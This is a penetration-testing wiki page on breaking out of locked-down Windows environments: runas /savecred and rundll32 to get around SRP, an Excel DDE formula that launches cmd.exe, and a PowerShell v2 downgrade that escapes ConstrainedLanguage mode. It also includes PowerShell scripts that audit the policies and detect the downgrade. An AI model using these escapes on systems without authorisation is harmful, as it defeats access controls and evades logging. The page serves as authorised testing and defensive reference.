Environment escapes

Penetration Testing Wiki

Escape Citrix or cmd.exe disabled by SRP

Software Restriction Policies (SRP) and Citrix published-application lockdowns usually block cmd.exe by path or hash. Other signed Windows binaries that can start a process for you are often not covered by the same rules, so try those first:

runas /savecred /user:<username> calc.exe
RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

E.g.:

rundll32.exe user32.dll,LockWorkStation
start cmd

runas /savecred only helps if that account's credentials were stored earlier with /savecred (they live in Credential Manager), and the option is not available on Home editions. The rundll32 line is a harmless probe: it locks the workstation, and if the exported function runs, rundll32 itself is not blocked and can be pointed at any DLL entry point you can reach.
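Before reaching for runas.exe or rundll32.exe it is worth reading the SRP configuration to see what the deny rule actually covers. The following is an added example, not code from the original page: it reads the SRP policy hive (DefaultLevel, TransparentEnabled, PolicyScope and the per-level Paths/Hashes rule subkeys) and estimates which level a given executable falls under by matching path rules, longest match first. Hash rules are listed but not evaluated, since that needs the file's hash, and the path matching is an approximation of SRP's own precedence rules.

```powershell
# Added example, not from the original page: read the SRP configuration from the policy
# hive and estimate which level a given executable falls under, so you can see whether the
# deny rule really covers only cmd.exe before trying runas.exe or rundll32.exe.
function Get-SrpPolicy {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    if (-not (Test-Path $base)) { return $null }          # no SRP deployed through policy
    $cfg = Get-ItemProperty $base
    # Security levels SRP stores as subkey names: 0 = Disallowed, 0x20000 = Basic User, 0x40000 = Unrestricted
    $levelName = @{ 0 = 'Disallowed'; 131072 = 'BasicUser'; 262144 = 'Unrestricted' }
    $rules = foreach ($lvl in Get-ChildItem $base) {
        if ($lvl.PSChildName -notmatch '^\d+$') { continue }
        $name = $levelName[[int]$lvl.PSChildName]
        foreach ($kind in 'Paths', 'Hashes') {
            $k = Join-Path $lvl.PSPath $kind
            if (-not (Test-Path $k)) { continue }
            foreach ($rule in Get-ChildItem $k) {
                $p = Get-ItemProperty $rule.PSPath
                # Path rules keep the path (with %ENV% variables) in ItemData; hash rules keep the file name in FriendlyName
                if ($kind -eq 'Paths') { $ruleText = $p.ItemData } else { $ruleText = $p.FriendlyName }
                [pscustomobject]@{ Level = $name; Type = $kind.TrimEnd('s'); Rule = $ruleText; Note = $p.Description }
            }
        }
    }
    [pscustomobject]@{
        DefaultLevel        = $levelName[[int]$cfg.DefaultLevel]
        # TransparentEnabled: 0 = SRP off, 1 = all software files except DLLs, 2 = all software files
        EnforceDlls         = ($cfg.TransparentEnabled -eq 2)
        # PolicyScope: 0 = all users, 1 = everyone except local administrators
        SkipsAdministrators = ($cfg.PolicyScope -eq 1)
        ExecutableTypes     = $cfg.ExecutableTypes
        Rules               = @($rules)
    }
}

function Get-SrpLevelFor {
    param([Parameter(Mandatory)][string]$Exe, $Policy = (Get-SrpPolicy))
    if (-not $Policy) { return 'NoSrp' }
    $full = [Environment]::ExpandEnvironmentVariables($Exe)
    # Path rules only; the longest matching rule is the most specific and wins.
    # A rule naming a folder covers everything beneath it, hence the trailing *.
    $hit = $Policy.Rules | Where-Object { $_.Type -eq 'Path' } | ForEach-Object {
        $pattern = [Environment]::ExpandEnvironmentVariables($_.Rule)
        if ($full -like "$pattern*") { $_ }
    } | Sort-Object { $_.Rule.Length } -Descending | Select-Object -First 1
    if ($hit) { $hit.Level } else { $Policy.DefaultLevel }
}

# Usage: dump the policy, then see how the three binaries from this page are treated
$srp = Get-SrpPolicy
$srp | Select-Object DefaultLevel, EnforceDlls, SkipsAdministrators, ExecutableTypes
$srp.Rules | Format-Table Level, Type, Rule, Note
foreach ($exe in 'cmd.exe', 'runas.exe', 'rundll32.exe') {
    '{0,-12} -> {1}' -f $exe, (Get-SrpLevelFor "%windir%\System32\$exe" $srp)
}
```

If cmd.exe comes back Disallowed while runas.exe and rundll32.exe inherit an Unrestricted default, the rule set is exactly the kind this section targets. SkipsAdministrators tells you whether a local admin token would be exempt altogether, and EnforceDlls whether rundll32 loading an arbitrary DLL would itself be checked.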

Escape Excel

Excel command execution through a DDE formula (typed into any cell; no macro or VBA needed):

=cmd|'/C calc.exe'!__xA1

Excel parses this as a Dynamic Data Exchange link: cmd is the DDE server application, /C calc.exe is the topic, which becomes the server's command line when Excel launches it, and the text after ! is the item name, which can be any token because cmd.exe never answers the DDE request. Excel starts cmd.exe when the formula is entered or the link is updated. Current Office builds show a warning before launching the external application, and the launch can be disabled per user by policy.
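Whether the payload above gets to launch cmd.exe depends on Excel's DDE settings. The following is an added example, not code from the original page: it reports the DDE hardening state for each installed Office generation, reading the DisableDDEServerLaunch and DisableDDEServerLookup values Microsoft documented in ADV170021. It also checks the per-user Software\Policies hive, which is assumed to be where Group Policy delivers the same settings.

```powershell
# Added example, not from the original page: report the Excel DDE hardening state for each
# installed Office generation, using the value names Microsoft documented in ADV170021.
# The Software\Policies hive is checked first on the assumption that GPO-managed values land there.
function Get-ExcelDdeState {
    # Office 2010 = 14.0, 2013 = 15.0, 2016/2019/2021/365 = 16.0
    foreach ($ver in '14.0', '15.0', '16.0') {
        $keys = @("HKCU:\Software\Policies\Microsoft\Office\$ver\Excel\Security",
                  "HKCU:\Software\Microsoft\Office\$ver\Excel\Security")
        $present = @($keys | Where-Object { Test-Path $_ })
        if ($present.Count -eq 0) { continue }
        # First hit wins, so a policy-managed value shadows the user's own setting
        $launch = $null; $lookup = $null
        foreach ($k in $present) {
            $p = Get-ItemProperty $k
            if ($null -eq $launch) { $launch = $p.DisableDDEServerLaunch }
            if ($null -eq $lookup) { $lookup = $p.DisableDDEServerLookup }
        }
        [pscustomobject]@{
            Office              = $ver
            # 1 = Excel will not start a DDE server application (cmd.exe for the payload above) to satisfy a link
            ServerLaunchBlocked = ($launch -eq 1)
            # 1 = Excel will not connect to a DDE server that is already running either
            ServerLookupBlocked = ($lookup -eq 1)
            # Launch not blocked: the payload still shows its warning dialogs and runs if the user accepts them
            PayloadCanLaunch    = ($launch -ne 1)
        }
    }
}

Get-ExcelDdeState | Format-Table
```

An empty result means no Excel generation has written its Security key for this user, which usually means Excel was never started under this account rather than that DDE is blocked.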

Escape PowerShell

PowerShell evasion inside ConstrainedLanguage mode (check the current mode with $ExecutionContext.SessionState.LanguageMode):

Method 1: Downgrade PowerShell to v2

powershell.exe -Version 2 -ep bypass -nop

ConstrainedLanguage mode and the __PSLockdownPolicy switch that enforces it arrived with PowerShell 3, so a v2 engine started this way runs in FullLanguage mode. It only works where the Windows PowerShell 2.0 engine and the .NET Framework 3.5 (CLR 2.0) it depends on are still installed; the engine has been deprecated since 2017 and is missing on hardened or recent builds. The downgrade is also easy to spot, because the Windows PowerShell event log records the engine version of every session start.

Method 2 (unverified): runas powershell, i.e. start powershell.exe as a different user through runas.
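The following is an added example, not code from the original page, covering Method 1 from both sides: it reports the current lockdown state and whether the v2 engine's prerequisites are present, launches a v2 child and reads back the language mode it actually got, and shows the defender-side query over the classic Windows PowerShell log (event 400, whose message carries EngineVersion= and HostApplication=). It is written to run from inside ConstrainedLanguage mode, so it sticks to cmdlets and native commands and avoids .NET method calls.

```powershell
# Added example, not from the original page: probe whether the v2 downgrade is possible,
# try it, and show the defender-side query that catches it. Uses only cmdlets and native
# commands so it also runs from inside ConstrainedLanguage mode.
function Get-PsLockdownState {
    $envKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
    [pscustomobject]@{
        CurrentLanguageMode = [string]$ExecutionContext.SessionState.LanguageMode
        # Machine-wide lockdown switch; a value of 4 puts new PS3+ sessions into ConstrainedLanguage
        LockdownPolicy      = (Get-ItemProperty $envKey -ErrorAction SilentlyContinue).__PSLockdownPolicy
        # The v2 engine runs on CLR 2.0, which the .NET Framework 3.5 feature installs here
        Clr2Present         = Test-Path "$env:windir\Microsoft.NET\Framework\v2.0.50727\mscorlib.dll"
        # Optional feature that ships the engine (the query needs elevation; $null when refused)
        V2EngineFeature     = (Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue).State
    }
}

function Test-V2Downgrade {
    # Ask a v2 child for its engine version and language mode; 2>&1 also captures the error
    # text powershell.exe prints when the v2 engine is not installed
    $probe = "'{0}|{1}' -f `$PSVersionTable.PSVersion, `$ExecutionContext.SessionState.LanguageMode"
    $out = & "$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 2 -NoProfile -NonInteractive -Command $probe 2>&1
    $text = (@($out) | ForEach-Object { "$_" }) -join ' '
    if ($text -match '^(\d+\.\d+)\|(\w+)') {
        return [pscustomobject]@{
            Started           = $true
            ChildVersion      = $Matches[1]
            ChildLanguageMode = $Matches[2]
            Bypassed          = ($Matches[2] -eq 'FullLanguage')
        }
    }
    [pscustomobject]@{ Started = $false; Detail = $text.Trim() }
}

function Find-V2EngineStarts {
    # Defender side: event 400 is written at every engine start and its message lists
    # EngineVersion= and HostApplication= (the full command line, -Version 2 included)
    Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        ForEach-Object {
            $cmd = ''
            if ($_.Message -match 'HostApplication=(.+)') { $cmd = $Matches[1].Trim() }
            [pscustomobject]@{ Time = $_.TimeCreated; Command = $cmd }
        }
}

# Usage
Get-PsLockdownState
Test-V2Downgrade
Find-V2EngineStarts | Select-Object -First 5
```

Started = $false with a message about .NET Framework v2.0.50727 means the engine is gone and Method 1 is not available on that host. On the blue-team side the same event 400 query works even though v2 sessions produce no script block logging (event 4104), which is precisely what makes the downgrade attractive to an attacker.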